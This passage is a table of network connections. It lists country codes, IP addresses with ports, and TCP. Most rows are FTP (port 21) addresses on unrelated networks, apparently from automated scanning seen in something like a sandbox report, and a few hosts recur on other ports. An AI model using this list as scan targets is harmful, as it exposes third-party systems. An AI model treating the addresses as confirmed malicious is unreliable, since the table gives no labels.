| US | 192.236.85.7:21 | tcp | |
| IT | 37.207.138.7:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 169.24.98.7:21 | tcp | |
| CN | 101.19.36.7:21 | tcp | |
| JP | 219.42.119.7:21 | tcp | |
| US | 152.86.159.7:21 | tcp | |
| PE | 181.67.13.7:21 | tcp | |
| RU | 185.215.113.67:40960 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 61.154.0.139:9000 | tcp | |
| NL | 89.105.201.183:2023 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 185.208.158.202:80 | bertbhz.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 221.192.3.8:21 | tcp | |
| AU | 130.194.87.8:21 | tcp | |
| US | 107.193.154.8:21 | tcp | |
| EG | 197.122.156.8:21 | tcp | |
| US | 173.128.34.8:21 | tcp | |
| GB | 94.118.30.8:21 | tcp | |
| BD | 103.88.27.8:21 | tcp | |
| KR | 183.112.217.8:21 | tcp | |
| JP | 221.244.163.8:21 | tcp | |
| RU | 62.5.164.8:21 | tcp | |
| RU | 188.35.35.8:21 | tcp | |
| MA | 196.71.116.8:21 | tcp | |
| GB | 25.48.54.8:21 | tcp | |
| US | 134.14.150.8:21 | tcp | |
| US | 64.60.57.8:21 | tcp | |
| US | 73.101.131.8:21 | tcp | |
| AR | 186.56.139.8:21 | tcp | |
| JP | 1.112.128.8:21 | tcp | |
| BR | 179.201.93.8:21 | tcp | |
| US | 171.153.252.8:21 | tcp | |
| DE | 80.146.21.8:21 | tcp | |
| US | 138.34.129.8:21 | tcp | |
| US | 69.18.25.8:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 31.240.18.8:21 | tcp | |
| MX | 148.237.52.8:21 | tcp | |
| IN | 122.185.119.8:21 | tcp | |
| US | 97.186.160.8:21 | tcp | |
| TH | 114.128.107.8:21 | tcp | |
| US | 163.246.112.8:21 | tcp | |
| US | 9.86.151.8:21 | tcp | |
| MX | 187.238.172.8:21 | tcp | |
| SE | 193.45.136.8:21 | tcp | |
| US | 75.193.28.8:21 | tcp | |
| CN | 119.188.69.8:21 | tcp | |
| AU | 58.162.208.8:21 | tcp | |
| CN | 183.250.93.8:21 | tcp | |
| US | 192.220.19.8:21 | tcp | |
| BR | 177.106.76.8:21 | tcp | |
| JP | 13.192.41.8:21 | tcp | |
| US | 48.240.195.8:21 | tcp | |
| CN | 42.175.125.8:21 | tcp | |
| US | 28.58.251.8:21 | tcp | |
| KZ | 185.99.127.8:21 | tcp | |
| US | 72.76.43.8:21 | tcp | |
| KR | 211.185.82.8:21 | tcp | |
| US | 63.147.203.8:21 | tcp | |
| DE | 53.128.187.8:21 | tcp | |
| US | 50.233.77.8:21 | tcp | |
| US | 184.143.52.8:21 | tcp | |
| JP | 210.128.204.8:21 | tcp | |
| US | 192.189.110.8:21 | tcp | |
| US | 70.226.34.8:21 | tcp | |
| US | 47.192.67.8:21 | tcp | |
| TW | 175.98.57.8:21 | tcp | |
| AT | 46.125.145.8:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| JP | 126.98.53.8:21 | tcp | |
| US | 155.170.222.8:21 | tcp | |
| SG | 43.109.206.8:21 | tcp | |
| AE | 87.201.156.8:21 | tcp | |
| CN | 39.90.183.8:21 | tcp | |
| CZ | 62.40.87.8:21 | tcp | |
| IN | 119.227.186.8:21 | tcp | |
| BR | 189.39.74.8:21 | tcp | |
| BE | 87.64.60.8:21 | tcp | |
| CN | 43.180.184.8:21 | tcp | |
| PR | 70.45.232.8:21 | tcp | |
| KR | 163.152.52.8:21 | tcp | |
| JP | 150.80.238.8:21 | tcp | |
| IE | 57.194.5.8:21 | tcp | |
| PL | 217.96.197.8:21 | tcp | |
| CN | 218.106.197.8:21 | tcp | |
| RU | 91.188.176.8:21 | tcp | |
| KR | 210.112.30.8:21 | tcp | |
| JP | 153.130.36.8:21 | tcp | |
| CN | 183.159.240.8:21 | tcp | |
| US | 135.251.131.8:21 | tcp | |
| TW | 120.120.11.8:21 | tcp | |
| CO | 181.250.29.8:21 | tcp | |
| JP | 163.51.87.8:21 | tcp | |
| US | 132.8.17.8:21 | tcp | |
| US | 19.247.21.8:21 | tcp | |
| ZA | 41.133.43.8:21 | tcp | |
| NO | 20.251.115.8:21 | tcp | |
| US | 135.25.2.8:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| CN | 39.105.204.209:80 | tcp | |
| RU | 185.215.113.117:3333 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| JP | 202.240.210.9:21 | tcp | |
| US | 156.117.43.9:21 | tcp | |
| CN | 120.210.157.9:21 | tcp | |
| CN | 101.82.14.9:21 | tcp | |
| N/A | 10.6.38.9:21 | tcp | |
| US | 164.231.82.9:21 | tcp | |
| VE | 186.166.233.9:21 | tcp | |
| US | 107.42.64.9:21 | tcp | |
| US | 148.36.37.9:21 | tcp | |
| JP | 219.112.144.9:21 | tcp | |
| TW | 175.99.187.9:21 | tcp | |
| CN | 219.159.175.9:21 | tcp | |
| US | 204.255.168.9:21 | tcp | |
| US | 23.82.58.9:21 | tcp | |
| AU | 169.201.139.9:21 | tcp | |
| JP | 133.34.76.9:21 | tcp | |
| CA | 74.216.238.9:21 | tcp | |
| DE | 91.34.203.9:21 | tcp | |
| ZA | 197.169.132.9:21 | tcp | |
| US | 216.156.17.9:21 | tcp | |
| US | 17.229.167.9:21 | tcp | |
| US | 47.172.3.9:21 | tcp | |
| NL | 193.149.181.9:21 | tcp | |
| JP | 133.11.214.9:21 | tcp | |
| US | 44.244.153.9:21 | tcp | |
| US | 44.91.56.9:21 | tcp | |
| US | 164.189.144.9:21 | tcp | |
| US | 9.202.32.9:21 | tcp | |
| KR | 222.121.151.9:21 | tcp | |
| CN | 106.127.207.9:21 | tcp | |
| CH | 62.204.112.9:21 | tcp | |
| US | 135.225.146.9:21 | tcp | |
| IN | 112.196.110.9:21 | tcp | |
| US | 135.122.159.9:21 | tcp | |
| JP | 126.14.57.9:21 | tcp | |
| TW | 220.142.169.9:21 | tcp | |
| US | 140.60.70.9:21 | tcp | |
| CA | 142.126.118.9:21 | tcp | |
| CN | 123.149.80.9:21 | tcp | |
| US | 98.120.9.9:21 | tcp | |
| ID | 36.79.132.9:21 | tcp | |
| DE | 217.240.7.9:21 | tcp | |
| US | 135.81.211.9:21 | tcp | |
| US | 24.179.107.9:21 | tcp | |
| KG | 37.218.191.9:21 | tcp | |
| BR | 189.70.54.9:21 | tcp | |
| US | 6.58.0.9:21 | tcp | |
| US | 164.241.56.9:21 | tcp | |
| KR | 110.44.255.9:21 | tcp | |
| VN | 113.180.152.9:21 | tcp | |
| RU | 92.255.166.9:21 | tcp | |
| KR | 115.40.61.9:21 | tcp | |
| KR | 222.101.229.9:21 | tcp | |
| US | 173.82.128.9:21 | tcp | |
| CN | 43.250.220.9:21 | tcp | |
| CA | 216.25.18.9:21 | tcp | |
| US | 56.204.37.9:21 | tcp | |
| CA | 142.236.104.9:21 | tcp | |
| DE | 217.226.136.9:21 | tcp | |
| US | 146.209.183.9:21 | tcp | |
| US | 56.248.217.9:21 | tcp | |
| US | 167.120.198.9:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| JP | 219.111.35.9:21 | tcp | |
| US | 56.122.244.9:21 | tcp | |
| US | 38.151.68.9:21 | tcp | |
| US | 23.153.202.9:21 | tcp | |
| SE | 91.95.254.9:21 | tcp | |
| US | 56.182.17.9:21 | tcp | |
| KR | 61.78.17.9:21 | tcp | |
| AU | 162.145.124.9:21 | tcp | |
| GB | 25.235.212.9:21 | tcp | |
| CA | 115.167.26.9:21 | tcp | |
| US | 74.157.1.9:21 | tcp | |
| US | 132.41.150.9:21 | tcp | |
| NL | 89.105.201.183:2023 | tcp | |
| ZA | 165.146.43.9:21 | tcp | |
| SG | 43.68.183.9:21 | tcp | |
| JP | 118.67.110.9:21 | tcp | |
| US | 34.198.95.9:21 | tcp | |
| IS | 185.247.226.9:21 | tcp | |
| GB | 213.106.5.9:21 | tcp | |
| JP | 220.146.161.9:21 | tcp | |
| JP | 221.100.192.9:21 | tcp | |
| US | 136.125.245.9:21 | tcp | |
| SE | 164.135.32.9:21 | tcp | |
| US | 50.249.76.9:21 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 180.117.160.2:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:40960 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| US | 154.216.18.213:7000 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 173.40.26.10:21 | tcp | |
| US | 21.165.145.10:21 | tcp | |
| IR | 5.234.253.10:21 | tcp | |
| US | 165.223.12.10:21 | tcp | |
| EG | 102.15.28.10:21 | tcp | |
| US | 17.15.192.10:21 | tcp | |
| US | 131.65.163.10:21 | tcp | |
| US | 71.78.141.10:21 | tcp | |
| CN | 58.14.161.10:21 | tcp | |
| BR | 200.164.206.10:21 | tcp | |
| CN | 222.143.53.10:21 | tcp | |
| BR | 172.217.37.10:21 | tcp | |
| SE | 90.235.73.10:21 | tcp | |
| JP | 211.15.140.10:21 | tcp | |
| ES | 37.223.122.10:21 | tcp | |
| BR | 152.250.91.10:21 | tcp | |
| US | 170.121.16.10:21 | tcp | |
| US | 12.239.150.10:21 | tcp | |
| AU | 20.53.141.10:21 | tcp | |
| FR | 90.26.193.10:21 | tcp | |
| JP | 167.169.215.10:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 51.49.82.10:21 | tcp | |
| US | 47.208.46.10:21 | tcp | |
| JP | 133.173.182.10:21 | tcp | |
| US | 22.155.69.10:21 | tcp | |
| US | 64.133.242.10:21 | tcp | |
| US | 19.171.0.10:21 | tcp | |
| US | 205.143.148.10:21 | tcp | |
| US | 73.234.245.10:21 | tcp | |
| CN | 101.72.147.10:21 | tcp | |
| JP | 118.87.228.10:21 | tcp | |
| CN | 221.198.138.10:21 | tcp | |
| TN | 102.168.132.10:21 | tcp | |
| US | 198.198.244.10:21 | tcp | |
| DE | 2.200.52.10:21 | tcp | |
| US | 71.131.63.10:21 | tcp | |
| US | 199.83.78.10:21 | tcp | |
| US | 172.82.173.10:21 | tcp | |
| US | 130.207.36.10:21 | tcp | |
| US | 159.17.182.10:21 | tcp | |
| US | 167.214.220.10:21 | tcp | |
| TN | 102.107.250.10:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 75.247.81.10:21 | tcp | |
| MW | 102.71.12.10:21 | tcp | |
| US | 136.162.35.10:21 | tcp | |
| US | 15.34.131.10:21 | tcp | |
| DE | 87.164.75.10:21 | tcp | |
| US | 152.222.160.10:21 | tcp | |
| GB | 90.221.99.10:21 | tcp | |
| US | 15.173.166.10:21 | tcp | |
| TW | 114.46.188.10:21 | tcp | |
| US | 79.75.215.10:21 | tcp | |
| US | 15.69.251.10:21 | tcp | |
| US | 168.68.193.10:21 | tcp | |
| IT | 79.50.167.10:21 | tcp | |
| US | 137.182.24.10:21 | tcp | |
| KZ | 5.251.234.10:21 | tcp | |
| NL | 145.112.186.10:21 | tcp | |
| US | 192.172.107.10:21 | tcp | |
| US | 4.105.241.10:21 | tcp | |
| US | 9.184.22.10:21 | tcp | |
| US | 12.117.110.10:21 | tcp | |
| IT | 2.112.213.10:21 | tcp | |
| RU | 176.208.117.10:21 | tcp | |
| CN | 220.195.4.10:21 | tcp | |
| US | 166.140.89.10:21 | tcp | |
| US | 216.255.3.10:21 | tcp | |
| UG | 154.230.47.10:21 | tcp | |
| US | 16.221.157.10:21 | tcp | |
| UA | 89.209.153.10:21 | tcp | |
| BR | 104.104.169.10:21 | tcp | |
| US | 38.244.184.10:21 | tcp | |
| US | 104.230.143.10:21 | tcp | |
| US | 205.44.210.10:21 | tcp | |
| US | 48.235.151.10:21 | tcp | |
| US | 22.222.209.10:21 | tcp | |
| US | 152.218.44.10:21 | tcp | |
| US | 140.71.14.10:21 | tcp | |
| US | 154.44.5.10:21 | tcp | |
| US | 50.1.3.10:21 | tcp | |
| US | 148.131.46.10:21 | tcp | |
| DE | 195.2.181.10:21 | tcp | |
| US | 7.244.198.10:21 | tcp | |
| JP | 126.127.91.10:21 | tcp | |
| US | 214.83.181.10:21 | tcp | |
| GB | 146.198.242.10:21 | tcp | |
| BR | 152.232.78.10:21 | tcp | |
| US | 162.16.68.10:21 | tcp | |
| FI | 89.17.82.10:21 | tcp | |
| FJ | 27.123.163.10:21 | tcp | |
| CN | 222.208.195.10:21 | tcp | |
| JP | 221.42.87.10:21 | tcp | |
| JP | 219.163.155.10:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.217:80 | 185.215.113.217 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| PL | 185.16.38.41:2035 | tcp | |
| RU | 185.215.113.117:3333 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 136.243.76.21:445 | tcp | |
| DE | 136.243.76.21:139 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| PH | 1.37.14.11:21 | tcp | |
| US | 167.137.83.11:21 | tcp | |
| CN | 106.80.14.11:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IT | 78.6.23.11:21 | tcp | |
| DE | 185.215.206.11:21 | tcp | |
| CN | 36.197.150.11:21 | tcp | |
| SA | 83.101.218.11:21 | tcp | |
| N/A | 10.154.77.11:21 | tcp | |
| US | 164.216.213.11:21 | tcp | |
| CN | 221.183.250.11:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| FR | 79.90.26.11:21 | tcp | |
| US | 28.17.103.11:21 | tcp | |
| EG | 156.166.159.11:21 | tcp | |
| US | 216.57.136.11:21 | tcp | |
| US | 56.235.21.11:21 | tcp | |
| US | 7.126.22.11:21 | tcp | |
| US | 165.217.194.11:21 | tcp | |
| SG | 43.124.29.11:21 | tcp | |
| JP | 223.135.231.11:21 | tcp | |
| JP | 106.157.127.11:21 | tcp | |
| GB | 31.70.106.11:21 | tcp | |
| CN | 42.81.173.11:21 | tcp | |
| KR | 220.92.65.11:21 | tcp | |
| CN | 106.45.54.11:21 | tcp | |
| TR | 95.5.29.11:21 | tcp | |
| TW | 150.116.34.11:21 | tcp | |
| US | 199.3.130.11:21 | tcp | |
| IT | 79.24.108.11:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 217.87.232.11:21 | tcp | |
| IE | 57.143.9.11:21 | tcp | |
| US | 216.105.134.11:21 | tcp | |
| IN | 116.75.63.11:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 216.214.76.11:21 | tcp | |
| JP | 210.238.251.11:21 | tcp | |
| N/A | 10.168.55.11:21 | tcp | |
| CN | 124.230.99.11:21 | tcp | |
| GR | 213.16.172.11:21 | tcp | |
| CA | 173.178.7.11:21 | tcp | |
| US | 216.124.62.11:21 | tcp | |
| UG | 155.255.6.11:21 | tcp | |
| US | 70.136.197.11:21 | tcp | |
| US | 6.214.128.11:21 | tcp | |
| KR | 119.214.151.11:21 | tcp | |
| IN | 117.215.95.11:21 | tcp | |
| US | 48.253.254.11:21 | tcp | |
| US | 20.72.253.11:21 | tcp | |
| US | 146.38.76.11:21 | tcp | |
| US | 23.229.184.11:21 | tcp | |
| IT | 80.211.184.11:21 | tcp | |
| US | 141.214.200.11:21 | tcp | |
| US | 165.131.159.11:21 | tcp | |
| DE | 37.82.213.11:21 | tcp | |
| JP | 17.132.80.11:21 | tcp | |
| FR | 4.233.50.11:21 | tcp | |
| US | 30.199.11.11:21 | tcp | |
| KR | 14.67.250.11:21 | tcp | |
| CN | 220.185.179.11:21 | tcp | |
| PL | 185.16.38.41:2022 | tcp | |
| JP | 218.230.176.11:21 | tcp | |
| US | 73.26.187.11:21 | tcp | |
| CN | 180.140.158.11:21 | tcp | |
| CN | 125.37.201.11:21 | tcp | |
| US | 24.218.90.11:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 74.159.189.11:21 | tcp | |
| VN | 103.195.241.11:21 | tcp | |
| KR | 220.84.110.11:21 | tcp | |
| CN | 42.162.231.11:21 | tcp | |
| US | 131.171.213.11:21 | tcp | |
| HK | 156.230.170.11:21 | tcp | |
| US | 66.214.231.11:21 | tcp | |
| US | 20.109.238.11:21 | tcp | |
| US | 34.210.119.11:21 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| NL | 145.103.1.11:21 | tcp | |
| US | 171.139.141.11:21 | tcp | |
| US | 69.223.18.11:21 | tcp | |
| AU | 203.219.128.11:21 | tcp | |
| NZ | 162.112.29.11:21 | tcp | |
| CY | 62.152.20.11:21 | tcp | |
| FR | 46.33.168.11:21 | tcp | |
| NL | 20.61.195.11:21 | tcp | |
| US | 132.14.155.11:21 | tcp | |
| DE | 53.49.205.11:21 | tcp | |
| SG | 43.14.77.11:21 | tcp | |
| CN | 103.107.31.11:21 | tcp | |
| US | 3.31.56.11:21 | tcp | |
| US | 209.147.23.11:21 | tcp | |
| IN | 223.226.80.11:21 | tcp | |
| US | 97.199.106.11:21 | tcp | |
| CN | 222.186.172.42:1000 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:40960 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| KR | 114.199.206.12:21 | tcp | |
| US | 32.56.84.12:21 | tcp | |
| AU | 13.236.2.12:21 | tcp | |
| US | 153.57.57.12:21 | tcp | |
| TR | 85.97.172.12:21 | tcp | |
| US | 168.54.104.12:21 | tcp | |
| TW | 61.231.147.12:21 | tcp | |
| US | 99.42.111.12:21 | tcp | |
| US | 166.203.129.12:21 | tcp | |
| US | 170.136.240.12:21 | tcp | |
| US | 167.78.168.12:21 | tcp | |
| DE | 79.226.224.12:21 | tcp | |
| US | 146.29.66.12:21 | tcp | |
| JP | 133.77.79.12:21 | tcp | |
| TH | 157.179.247.12:21 | tcp | |
| CN | 119.248.255.12:21 | tcp | |
| US | 11.50.227.12:21 | tcp | |
| US | 209.185.11.12:21 | tcp | |
| GB | 195.68.207.12:21 | tcp | |
| AT | 213.47.197.12:21 | tcp | |
| US | 8.27.97.12:21 | tcp | |
| US | 70.148.121.12:21 | tcp | |
| NG | 102.88.77.12:21 | tcp | |
| US | 207.41.50.12:21 | tcp | |
| CN | 115.230.221.12:21 | tcp | |
| US | 29.243.184.12:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 33.177.49.12:21 | tcp | |
| US | 160.229.201.12:21 | tcp | |
| JP | 126.189.123.12:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| FR | 141.194.133.12:21 | tcp | |
| MU | 196.246.194.12:21 | tcp | |
| US | 146.57.6.12:21 | tcp | |
| CN | 120.9.43.12:21 | tcp | |
| IT | 35.152.15.12:21 | tcp | |
| US | 22.127.49.12:21 | tcp | |
| US | 75.24.117.12:21 | tcp | |
| US | 16.121.38.12:21 | tcp | |
| SI | 94.140.73.12:21 | tcp | |
| US | 73.7.238.12:21 | tcp | |
| GB | 25.179.197.12:21 | tcp | |
| KR | 211.183.104.12:21 | tcp | |
| JP | 194.223.230.12:21 | tcp | |
| CN | 116.205.26.12:21 | tcp | |
| KR | 43.201.11.12:21 | tcp | |
| CA | 132.246.163.12:21 | tcp | |
| HK | 175.159.119.12:21 | tcp | |
| FR | 78.255.90.12:21 | tcp | |
| CN | 61.153.8.12:21 | tcp | |
| RS | 178.222.155.12:21 | tcp | |
| CN | 203.148.32.12:21 | tcp | |
| CN | 123.66.102.12:21 | tcp | |
| TW | 140.124.241.12:21 | tcp | |
| DE | 53.175.154.12:21 | tcp | |
| CN | 8.131.198.12:21 | tcp | |
| BR | 191.36.125.12:21 | tcp | |
| MX | 189.136.249.12:21 | tcp | |
| US | 35.173.134.12:21 | tcp | |
| CA | 142.176.112.12:21 | tcp | |
| IT | 80.18.189.12:21 | tcp | |
| JP | 133.125.148.12:21 | tcp | |
| AU | 123.200.196.12:21 | tcp | |
| US | 99.18.71.12:21 | tcp | |
| BR | 177.88.52.12:21 | tcp | |
| US | 52.206.4.12:21 | tcp | |
| KR | 125.134.117.12:21 | tcp | |
| KR | 121.146.223.12:21 | tcp | |
| NL | 77.61.32.12:21 | tcp | |
| BR | 189.116.120.12:21 | tcp | |
| US | 3.164.23.12:21 | tcp | |
| FR | 88.138.48.12:21 | tcp | |
| US | 169.137.108.12:21 | tcp | |
| US | 97.150.236.12:21 | tcp | |
| LT | 193.200.209.12:21 | tcp | |
| GB | 45.56.249.12:21 | tcp | |
| ES | 90.74.245.12:21 | tcp | |
| CN | 182.205.233.12:21 | tcp | |
| AU | 101.160.222.12:21 | tcp | |
| US | 22.55.23.12:21 | tcp | |
| US | 144.171.82.12:21 | tcp | |
| US | 24.245.8.12:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.117:3333 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.204.212.9:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| TZ | 197.186.148.13:21 | tcp | |
| AU | 123.100.48.13:21 | tcp | |
| US | 20.14.8.13:21 | tcp | |
| US | 184.138.250.13:21 | tcp | |
| US | 71.9.182.13:21 | tcp | |
| US | 166.228.132.13:21 | tcp | |
| TN | 102.31.130.13:21 | tcp | |
| BR | 20.197.223.13:21 | tcp | |
| IT | 93.55.157.13:21 | tcp | |
| PY | 181.120.56.13:21 | tcp | |
| US | 134.253.36.13:21 | tcp | |
| KR | 125.249.13.13:21 | tcp | |
| US | 166.21.78.13:21 | tcp | |
| US | 44.114.206.13:21 | tcp | |
| IN | 183.82.50.13:21 | tcp | |
| JP | 14.128.90.13:21 | tcp | |
| CN | 39.168.248.13:21 | tcp | |
| RE | 77.143.164.13:21 | tcp | |
| KE | 154.78.67.13:21 | tcp | |
| US | 108.247.176.13:21 | tcp | |
| US | 96.124.192.13:21 | tcp | |
| KR | 182.227.32.13:21 | tcp | |
| US | 136.81.146.13:21 | tcp | |
| CA | 142.89.246.13:21 | tcp | |
| US | 185.208.158.202:80 | bertbhz.com | tcp |
| CN | 60.252.144.13:21 | tcp | |
| CN | 122.77.229.13:21 | tcp | |
| CN | 36.183.167.13:21 | tcp | |
| US | 3.144.211.13:21 | tcp | |
| RU | 91.232.197.13:21 | tcp | |
| US | 68.113.229.13:21 | tcp | |
| JP | 110.66.226.13:21 | tcp | |
| US | 140.27.194.13:21 | tcp | |
| US | 19.70.153.13:21 | tcp | |
| US | 55.147.28.13:21 | tcp | |
| US | 17.207.86.13:21 | tcp | |
| AR | 200.4.68.13:21 | tcp | |
| MA | 196.80.8.13:21 | tcp | |
| DE | 81.25.162.13:21 | tcp | |
| GB | 196.47.95.13:21 | tcp | |
| US | 215.63.185.13:21 | tcp | |
| GB | 139.153.13.13:21 | tcp | |
| MY | 115.164.220.13:21 | tcp | |
| EG | 156.199.203.13:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 146.95.47.13:21 | tcp | |
| US | 76.232.79.13:21 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 53.209.98.13:21 | tcp | |
| US | 96.103.111.13:21 | tcp | |
| CA | 142.64.79.13:21 | tcp | |
| EG | 196.202.116.13:21 | tcp | |
| US | 194.42.206.13:21 | tcp | |
| FR | 90.83.88.13:21 | tcp | |
| US | 174.141.21.13:21 | tcp | |
| CN | 113.195.95.13:21 | tcp | |
| JP | 150.92.94.13:21 | tcp | |
| ID | 114.3.160.13:21 | tcp | |
| US | 35.32.88.13:21 | tcp | |
| CN | 211.89.222.13:21 | tcp | |
| BR | 179.42.89.13:21 | tcp | |
| SA | 151.173.147.13:21 | tcp | |
| JP | 17.87.108.13:21 | tcp | |
| US | 22.145.102.13:21 | tcp | |
| KR | 123.111.226.13:21 | tcp | |
| US | 20.57.56.13:21 | tcp | |
| FI | 130.230.219.13:21 | tcp | |
| MX | 132.248.104.13:21 | tcp | |
| ME | 95.155.48.13:21 | tcp | |
| US | 23.6.117.13:21 | tcp | |
| US | 128.155.57.13:21 | tcp | |
| DE | 91.29.108.13:21 | tcp | |
| CN | 39.143.82.13:21 | tcp | |
| US | 4.91.202.13:21 | tcp | |
| DE | 62.125.216.13:21 | tcp | |
| US | 68.124.111.13:21 | tcp | |
| ES | 46.24.173.13:21 | tcp | |
| ZA | 105.227.86.13:21 | tcp | |
| DE | 78.51.8.13:21 | tcp | |
| CN | 101.133.222.13:21 | tcp | |
| US | 38.30.82.13:21 | tcp | |
| CA | 96.48.10.13:21 | tcp | |
| NO | 193.71.142.13:21 | tcp | |
| US | 206.223.5.13:21 | tcp | |
| KE | 197.156.167.13:21 | tcp | |
| DE | 95.223.231.13:21 | tcp | |
| CA | 99.252.213.13:21 | tcp | |
| US | 150.135.16.13:21 | tcp | |
| LC | 57.91.157.13:21 | tcp | |
| DE | 53.5.146.13:21 | tcp | |
| CN | 222.186.172.42:1000 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 89.105.201.183:2023 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
